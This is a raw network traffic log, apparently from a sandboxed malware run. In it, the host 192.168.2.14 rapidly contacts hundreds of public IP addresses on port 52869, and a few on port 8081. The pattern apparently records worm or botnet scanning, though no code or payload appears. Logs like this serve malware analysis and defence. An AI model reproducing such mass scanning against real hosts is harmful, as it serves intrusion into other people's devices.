                                                Jul 20, 2024 23:05:31.998209953 CEST2696652869192.168.2.1459.242.125.217
                                                Jul 20, 2024 23:05:31.998209953 CEST2696652869192.168.2.14205.8.145.6
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.14199.202.13.130
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.14111.192.150.203
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.1493.244.188.64
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.14123.111.19.233
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.14217.161.186.84
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.1414.148.186.244
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.1443.119.39.158
                                                Jul 20, 2024 23:05:31.998250961 CEST2696652869192.168.2.14220.224.214.129
                                                Jul 20, 2024 23:05:31.998267889 CEST528692696685.2.134.27192.168.2.14
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.14100.242.161.152
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.14208.190.47.45
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.14220.85.100.118
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.14159.79.50.159
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.1488.243.181.245
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.14183.41.221.53
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.1453.250.100.174
                                                Jul 20, 2024 23:05:31.998342037 CEST2696652869192.168.2.1412.117.96.240
                                                Jul 20, 2024 23:05:31.998346090 CEST5286926966114.253.230.78192.168.2.14
                                                Jul 20, 2024 23:05:31.998351097 CEST528692696643.52.6.211192.168.2.14
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.1443.123.34.209
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.14192.36.11.156
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.1480.33.234.217
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.14220.27.166.91
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.1486.163.46.190
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.14123.47.34.183
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.14104.168.168.224
                                                Jul 20, 2024 23:05:31.998389959 CEST2696652869192.168.2.14136.176.36.12
                                                Jul 20, 2024 23:05:31.998929024 CEST5286926966150.137.36.182192.168.2.14
                                                Jul 20, 2024 23:05:31.999094963 CEST5286926966176.75.220.167192.168.2.14
                                                Jul 20, 2024 23:05:31.999151945 CEST5286926966102.126.174.49192.168.2.14
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.14142.78.152.174
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1438.58.57.187
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1498.204.63.160
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1485.92.221.132
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1478.106.126.128
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1458.187.24.14
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1484.176.4.197
                                                Jul 20, 2024 23:05:31.999238014 CEST2696652869192.168.2.1474.165.192.1
                                                Jul 20, 2024 23:05:31.999392033 CEST528692696666.24.201.56192.168.2.14
                                                Jul 20, 2024 23:05:31.999521971 CEST5286926966188.78.100.195192.168.2.14
                                                Jul 20, 2024 23:05:31.999577045 CEST5286926966171.139.100.38192.168.2.14
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.14184.120.85.233
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.1444.94.77.219
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.14219.251.58.169
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.149.46.190.218
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.14108.163.57.3
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.14128.233.224.41
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.1468.236.166.115
                                                Jul 20, 2024 23:05:31.999710083 CEST2696652869192.168.2.14180.112.125.192
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.14132.39.168.140
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.14162.12.166.249
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.1417.189.220.248
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.14180.106.180.212
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.1438.130.134.142
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.1449.132.116.240
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.14109.170.180.65
                                                Jul 20, 2024 23:05:31.999948978 CEST2696652869192.168.2.14141.117.5.138
                                                Jul 20, 2024 23:05:31.999969006 CEST5286926966118.162.15.87192.168.2.14
                                                Jul 20, 2024 23:05:32.000026941 CEST5286926966212.27.232.196192.168.2.14
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.14114.179.104.124
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.14199.117.44.204
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.1491.85.138.225
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.14202.183.171.29
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.1448.191.112.200
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.1457.144.122.58
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.14168.85.33.243
                                                Jul 20, 2024 23:05:32.000041008 CEST2696652869192.168.2.1459.135.63.153
                                                Jul 20, 2024 23:05:32.000127077 CEST5286926966192.4.87.149192.168.2.14
                                                Jul 20, 2024 23:05:32.000315905 CEST5286926966142.28.94.87192.168.2.14
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.149.71.131.31
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.14206.53.82.225
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.1458.236.61.29
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.1473.174.204.179
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.142.163.63.233
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.1435.159.139.53
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.14168.99.192.8
                                                Jul 20, 2024 23:05:32.000366926 CEST2696652869192.168.2.141.211.28.20
                                                Jul 20, 2024 23:05:32.000461102 CEST528692696613.103.166.161192.168.2.14
                                                Jul 20, 2024 23:05:32.000466108 CEST528692696639.112.44.8192.168.2.14
                                                Jul 20, 2024 23:05:32.000471115 CEST528692696699.142.28.231192.168.2.14
                                                Jul 20, 2024 23:05:32.000570059 CEST5286926966163.207.135.120192.168.2.14
                                                Jul 20, 2024 23:05:32.000575066 CEST5286926966138.118.192.144192.168.2.14
                                                Jul 20, 2024 23:05:32.000658035 CEST5286926966106.242.159.86192.168.2.14
                                                Jul 20, 2024 23:05:32.000775099 CEST528692696647.189.88.4192.168.2.14
                                                Jul 20, 2024 23:05:32.000780106 CEST5286926966192.204.207.69192.168.2.14
                                                Jul 20, 2024 23:05:32.000783920 CEST5286926966131.172.186.104192.168.2.14
                                                Jul 20, 2024 23:05:32.000793934 CEST5286926966196.77.67.46192.168.2.14
                                                Jul 20, 2024 23:05:32.000809908 CEST528692696623.103.185.202192.168.2.14
                                                Jul 20, 2024 23:05:32.000866890 CEST528692696681.106.75.29192.168.2.14
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.1491.48.213.35
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.14162.96.80.170
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.1459.165.217.161
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.1478.147.130.95
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.1431.247.190.180
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.14177.160.195.13
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.1477.237.114.164
                                                Jul 20, 2024 23:05:32.001024008 CEST2696652869192.168.2.14170.98.124.78
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.1478.87.122.111
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.14101.192.223.216
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.14129.129.31.24
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.14113.202.183.61
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.1499.35.215.64
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.14179.8.112.110
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.141.94.40.26
                                                Jul 20, 2024 23:05:32.001138926 CEST2696652869192.168.2.14158.15.232.165
                                                Jul 20, 2024 23:05:32.001348972 CEST5286926966188.77.131.223192.168.2.14
                                                Jul 20, 2024 23:05:32.001914024 CEST2696652869192.168.2.1446.103.116.159
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.14118.75.62.14
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.14113.47.213.157
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.1479.15.211.18
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.14134.144.46.130
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.14140.198.134.198
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.1450.167.84.34
                                                Jul 20, 2024 23:05:32.001914978 CEST2696652869192.168.2.1412.94.49.225
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14183.119.35.244
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14114.225.14.65
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14190.147.108.124
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.1431.136.109.228
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14208.117.82.120
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14141.231.43.221
                                                Jul 20, 2024 23:05:32.001959085 CEST2696652869192.168.2.14175.166.165.48
                                                Jul 20, 2024 23:05:32.001960039 CEST2696652869192.168.2.14172.126.0.115
                                                Jul 20, 2024 23:05:32.002157927 CEST528692696634.254.39.110192.168.2.14
                                                Jul 20, 2024 23:05:32.002386093 CEST528692696649.40.14.168192.168.2.14
                                                Jul 20, 2024 23:05:32.002526045 CEST5286926966204.136.75.160192.168.2.14
                                                Jul 20, 2024 23:05:32.002585888 CEST528692696686.190.219.155192.168.2.14
                                                Jul 20, 2024 23:05:32.002589941 CEST5286926966108.217.234.151192.168.2.14
                                                Jul 20, 2024 23:05:32.002640009 CEST528692696619.19.127.134192.168.2.14
                                                Jul 20, 2024 23:05:32.002684116 CEST528692696624.36.23.230192.168.2.14
                                                Jul 20, 2024 23:05:32.002979040 CEST2696652869192.168.2.14162.47.82.104
                                                Jul 20, 2024 23:05:32.002979040 CEST2696652869192.168.2.1434.247.156.202
                                                Jul 20, 2024 23:05:32.002979040 CEST2696652869192.168.2.1478.129.211.10
                                                Jul 20, 2024 23:05:32.002979040 CEST2696652869192.168.2.14112.153.191.145
                                                Jul 20, 2024 23:05:32.002979040 CEST2696652869192.168.2.14106.240.191.91
                                                Jul 20, 2024 23:05:32.002979994 CEST2696652869192.168.2.14216.11.155.229
                                                Jul 20, 2024 23:05:32.002979994 CEST2696652869192.168.2.14212.202.97.136
                                                Jul 20, 2024 23:05:32.002979994 CEST2696652869192.168.2.1425.145.229.184
                                                Jul 20, 2024 23:05:32.003086090 CEST528692696658.166.14.49192.168.2.14
                                                Jul 20, 2024 23:05:32.003091097 CEST5286926966185.131.102.32192.168.2.14
                                                Jul 20, 2024 23:05:32.003171921 CEST5286926966100.242.161.152192.168.2.14
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.1420.40.190.208
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.14179.21.144.79
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.1437.154.117.198
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.14136.195.130.35
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.1417.92.216.196
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.1465.155.38.231
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.1489.77.15.240
                                                Jul 20, 2024 23:05:32.003273010 CEST2696652869192.168.2.14115.97.137.57
                                                Jul 20, 2024 23:05:32.003465891 CEST52869269665.253.12.5192.168.2.14
                                                Jul 20, 2024 23:05:32.003525019 CEST528692696625.44.198.165192.168.2.14
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.14200.238.182.46
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1417.150.249.106
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1452.192.238.227
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1423.55.138.59
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.14211.88.161.89
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1437.213.85.230
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1452.222.226.79
                                                Jul 20, 2024 23:05:32.003537893 CEST2696652869192.168.2.1473.26.201.192
                                                Jul 20, 2024 23:05:32.003741026 CEST5286926966113.5.116.213192.168.2.14
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.14100.147.99.239
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.14185.59.206.117
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.1480.164.32.127
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.14197.23.60.58
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.14207.229.195.229
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.14164.159.1.86
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.1487.111.119.131
                                                Jul 20, 2024 23:05:32.003964901 CEST2696652869192.168.2.1436.31.128.72
                                                Jul 20, 2024 23:05:32.003967047 CEST5286926966216.99.12.212192.168.2.14
                                                Jul 20, 2024 23:05:32.003972054 CEST528692696643.123.34.209192.168.2.14
                                                Jul 20, 2024 23:05:32.004096031 CEST5286926966140.246.6.93192.168.2.14
                                                Jul 20, 2024 23:05:32.004101038 CEST5286926966192.36.11.156192.168.2.14
                                                Jul 20, 2024 23:05:32.004415035 CEST5286926966208.190.47.45192.168.2.14
                                                Jul 20, 2024 23:05:32.004534006 CEST5286926966136.20.227.19192.168.2.14
                                                Jul 20, 2024 23:05:32.004539967 CEST5286926966142.78.152.174192.168.2.14
                                                Jul 20, 2024 23:05:32.004544020 CEST5286926966190.13.210.38192.168.2.14
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.1439.176.203.73
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.1498.139.133.85
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.14172.51.35.214
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.141.146.229.84
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.1468.40.200.159
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.14218.210.113.18
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.1481.159.195.234
                                                Jul 20, 2024 23:05:32.004584074 CEST2696652869192.168.2.14115.150.189.67
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.14117.42.73.64
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.14166.57.172.211
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.1462.123.105.222
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.14133.212.46.75
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.14219.191.82.150
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.1419.70.24.112
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.142.202.170.175
                                                Jul 20, 2024 23:05:32.004745007 CEST2696652869192.168.2.14162.255.189.235
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.1498.220.90.229
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14136.134.137.226
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14116.18.86.111
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14187.175.255.52
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14126.220.63.76
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14153.115.93.223
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14179.12.201.79
                                                Jul 20, 2024 23:05:32.004779100 CEST2696652869192.168.2.14117.34.176.252
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.142.160.137.84
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14201.92.64.129
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.1436.129.193.156
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14201.98.195.221
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14117.161.21.35
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14128.53.220.52
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14118.128.140.96
                                                Jul 20, 2024 23:05:32.004868031 CEST2696652869192.168.2.14140.47.63.219
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.14153.89.222.39
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.14144.67.31.243
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.14117.42.61.40
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.1492.110.185.44
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.14190.114.151.234
                                                Jul 20, 2024 23:05:32.005302906 CEST2696652869192.168.2.14213.75.251.19
                                                Jul 20, 2024 23:05:32.005304098 CEST2696652869192.168.2.1479.137.108.6
                                                Jul 20, 2024 23:05:32.005409002 CEST528692696620.51.35.27192.168.2.14
                                                Jul 20, 2024 23:05:32.005594969 CEST528692696680.33.234.217192.168.2.14
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.144.231.153.224
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.14102.188.226.205
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.1480.59.225.141
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.14104.9.38.228
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.14218.251.210.117
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.1418.179.192.140
                                                Jul 20, 2024 23:05:32.005642891 CEST2696652869192.168.2.14126.252.62.133
                                                Jul 20, 2024 23:05:32.005773067 CEST5286926966184.120.85.233192.168.2.14
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14120.205.54.36
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14112.198.90.59
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.1464.229.118.224
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14120.108.60.158
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14105.164.56.144
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14216.62.74.39
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.145.27.107.135
                                                Jul 20, 2024 23:05:32.005861998 CEST2696652869192.168.2.14123.248.134.54
                                                Jul 20, 2024 23:05:32.005886078 CEST528692696644.94.77.219192.168.2.14
                                                Jul 20, 2024 23:05:32.005903006 CEST5286926966187.172.181.202192.168.2.14
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.14133.80.114.131
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.14138.188.233.114
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.1469.240.181.94
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.1485.82.40.120
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.1485.173.117.190
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.1491.206.91.62
                                                Jul 20, 2024 23:05:32.005995035 CEST5286926966220.85.100.118192.168.2.14
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.14178.79.223.204
                                                Jul 20, 2024 23:05:32.005992889 CEST2696652869192.168.2.14207.65.159.147
                                                Jul 20, 2024 23:05:32.006299019 CEST528692696678.87.122.111192.168.2.14
                                                Jul 20, 2024 23:05:32.006330967 CEST5286926966219.251.58.169192.168.2.14
                                                Jul 20, 2024 23:05:32.006442070 CEST5286926966159.79.50.159192.168.2.14
                                                Jul 20, 2024 23:05:32.006500006 CEST5286926966101.192.223.216192.168.2.14
                                                Jul 20, 2024 23:05:32.006505013 CEST5286926966220.27.166.91192.168.2.14
                                                Jul 20, 2024 23:05:32.006515980 CEST2696652869192.168.2.14158.199.47.135
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.1498.92.244.227
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.1460.71.198.184
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.1434.133.129.111
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.14138.196.94.202
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.14111.2.195.137
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.14197.19.158.166
                                                Jul 20, 2024 23:05:32.006516933 CEST2696652869192.168.2.14175.153.54.159
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.1454.179.197.253
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.14149.40.185.158
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.14138.179.150.234
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.14158.59.229.105
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.1432.156.133.181
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.1442.237.231.247
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.14211.168.65.67
                                                Jul 20, 2024 23:05:32.006551981 CEST2696652869192.168.2.1437.155.160.245
                                                Jul 20, 2024 23:05:32.006618977 CEST528692696638.58.57.187192.168.2.14
                                                Jul 20, 2024 23:05:32.006737947 CEST52869269669.46.190.218192.168.2.14
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.14168.88.234.28
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.14111.122.87.190
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.1490.3.162.18
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.14154.56.85.161
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.1427.121.250.129
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.14210.46.147.71
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.1472.231.32.39
                                                Jul 20, 2024 23:05:32.006808996 CEST2696652869192.168.2.1460.28.5.25
                                                Jul 20, 2024 23:05:32.006856918 CEST528692696688.243.181.245192.168.2.14
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14198.193.14.195
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.1457.215.231.230
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14186.53.99.238
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14165.53.194.234
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.1443.83.31.128
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14123.126.11.249
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14158.10.252.115
                                                Jul 20, 2024 23:05:32.007031918 CEST2696652869192.168.2.14186.135.28.10
                                                Jul 20, 2024 23:05:32.007168055 CEST528692696698.204.63.160192.168.2.14
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14210.93.144.172
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.1432.125.121.51
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14157.121.184.60
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14134.152.143.171
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14108.167.125.26
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.1454.135.221.53
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14133.17.182.216
                                                Jul 20, 2024 23:05:32.007214069 CEST2696652869192.168.2.14199.124.216.172
                                                Jul 20, 2024 23:05:32.007320881 CEST5286926966108.163.57.3192.168.2.14
                                                Jul 20, 2024 23:05:32.007560015 CEST528692696685.92.221.132192.168.2.14
                                                Jul 20, 2024 23:05:32.007607937 CEST5286926966128.233.224.41192.168.2.14
                                                Jul 20, 2024 23:05:32.007637024 CEST5286926966183.41.221.53192.168.2.14
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.144.107.32.7
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14110.110.210.158
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14118.239.0.22
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14168.103.98.57
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14131.37.148.1
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14149.255.36.61
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.14108.224.254.63
                                                Jul 20, 2024 23:05:32.007646084 CEST2696652869192.168.2.1452.137.137.200
                                                Jul 20, 2024 23:05:32.007728100 CEST2696652869192.168.2.14164.171.28.146
                                                Jul 20, 2024 23:05:32.007880926 CEST267108081192.168.2.1436.159.217.125
                                                Jul 20, 2024 23:05:32.007880926 CEST2696652869192.168.2.1477.165.177.101
                                                Jul 20, 2024 23:05:32.007880926 CEST2696652869192.168.2.1457.156.10.133
                                                Jul 20, 2024 23:05:32.007880926 CEST267108081192.168.2.1497.50.115.200
                                                Jul 20, 2024 23:05:32.007880926 CEST267108081192.168.2.1427.247.163.222
                                                Jul 20, 2024 23:05:32.007880926 CEST267108081192.168.2.14134.230.130.185
                                                Jul 20, 2024 23:05:32.007880926 CEST2696652869192.168.2.14133.38.109.131
                                                Jul 20, 2024 23:05:32.007880926 CEST2696652869192.168.2.14101.168.57.208
                                                Jul 20, 2024 23:05:32.008048058 CEST2696652869192.168.2.14171.9.15.23
                                                Jul 20, 2024 23:05:32.008048058 CEST2696652869192.168.2.14154.155.177.130
                                                Jul 20, 2024 23:05:32.008049011 CEST2696652869192.168.2.1466.77.217.34
                                                Jul 20, 2024 23:05:32.008049011 CEST2696652869192.168.2.1431.116.192.251
                                                Jul 20, 2024 23:05:32.008049011 CEST2696652869192.168.2.14166.6.119.34
                                                Jul 20, 2024 23:05:32.008258104 CEST2696652869192.168.2.1452.53.54.88
                                                Jul 20, 2024 23:05:32.008258104 CEST2696652869192.168.2.14106.178.32.105
                                                Jul 20, 2024 23:05:32.008258104 CEST2696652869192.168.2.14181.101.160.242
                                                Jul 20, 2024 23:05:32.008259058 CEST2696652869192.168.2.1418.143.116.51
                                                Jul 20, 2024 23:05:32.008259058 CEST2696652869192.168.2.14106.49.98.182
                                                Jul 20, 2024 23:05:32.008259058 CEST2696652869192.168.2.14203.160.70.249
                                                Jul 20, 2024 23:05:32.008259058 CEST2696652869192.168.2.1423.207.152.146
                                                Jul 20, 2024 23:05:32.008259058 CEST2696652869192.168.2.14138.159.92.55
                                                Jul 20, 2024 23:05:32.008419037 CEST5286926966129.129.31.24192.168.2.14
                                                Jul 20, 2024 23:05:32.008650064 CEST528692696668.236.166.115192.168.2.14
                                                Jul 20, 2024 23:05:32.008655071 CEST528692696678.106.126.128192.168.2.14
                                                Jul 20, 2024 23:05:32.008800983 CEST528692696686.163.46.190192.168.2.14
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14174.220.73.245
                                                Jul 20, 2024 23:05:32.008821964 CEST2696652869192.168.2.14131.173.248.11
